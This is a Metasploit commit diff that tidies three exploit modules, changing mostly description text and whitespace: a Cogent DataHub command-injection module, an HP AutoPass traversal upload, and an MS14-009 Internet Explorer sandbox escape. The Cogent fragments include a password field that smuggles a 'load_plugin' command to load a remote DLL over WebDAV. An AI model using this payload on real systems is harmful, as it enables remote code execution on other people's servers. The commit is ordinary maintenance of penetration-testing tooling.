Land rapid7#3486, release fixes

wvu · wvu · commit bfc6c871197d · 2014-07-01T11:04:06.000-05:00
Now with more @wchen-r7!
diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -22,7 +22,8 @@ def initialize
         makes insecure use of the datahub_command function with user controlled
         data, allowing execution of arbitrary datahub commands and scripts. This
         module has been tested successfully with Cogent DataHub 7.3.4 on
-        Windows 7 SP1.
+        Windows 7 SP1. Please also note that after exploitation, the remote service
+        will most likely hang and restart manually.
       },
       'Author'      => [
         'John Leitch', # Vulnerability discovery
@@ -50,7 +51,7 @@ module has been tested successfully with Cogent DataHub 7.3.4 on
     register_options(
       [
         OptString.new('URIPATH',   [ true,  'The URI to use (do not change)', '/']),
-        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on ' + 
+        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on ' +
                                                       '(do not change)', 80 ]),
         OptInt.new('WEBDAV_DELAY', [ true,  'Time that the HTTP Server will ' +
                                           'wait for the payload request', 20]),
@@ -374,7 +375,7 @@ def send_injection(dll)
       'vars_post' =>
         {
           'username' => rand_text_alpha(3 + rand(3)),
-          'password' => "#{rand_text_alpha(3 + rand(3))}\")" + 
+          'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
                         "(load_plugin \"#{dll}\" 1)(\""
         }
       }, 1)
@@ -414,7 +415,7 @@ def exploit
       @exploit_unc  = "\\\\#{@myhost}\\"
 
       if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
-        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' + 
+        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
                   'URIPATH=/')
       end
 
@@ -439,7 +440,7 @@ def exploit
           print_error("#{peer} - Unexpected answer")
         end
       else
-        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' + 
+        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
                   '\\\\host\\shared_folder\\base_name.dll')
       end
     end
diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@@ -17,9 +17,9 @@ def initialize(info = {})
       'Description' => %q{
         This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
         weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
-        authentication in the CommunicationServlet component. On the other hand, it's possible to
-        abuse a directory traversal when uploading files thorough the same component, allowing to
-        upload an arbitrary payload embedded in a JSP. The module has been tested successfully on
+        authentication in the CommunicationServlet component. Seond, it's possible to abuse a
+        directory traversal when uploading files thorough the same component, allowing to upload
+        an arbitrary payload embedded in a JSP. The module has been tested successfully on
         HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
       },
       'Author'       =>
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -32,11 +32,9 @@ def initialize(info={})
     super( update_info( info,
       'Name'		=> 'MS14-009 .NET Deployment Service IE Sandbox Escape',
       'Description'	=> %q{
-        This module abuses a process creation policy in the Internet Explorer Sandbox which allows
-        to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
-        exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
-        Level. Further interaction with the component allows to escape the Enhanced Protected Mode
-        and execute arbitrary code with Medium Integrity.
+        This module abuses a process creation policy in Internet Explorer's sandbox, specifically
+        in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the
+        Enhanced Protected Mode, and execute code with Medium Integrity.
       },
       'License'	=> MSF_LICENSE,
       'Author'	=>
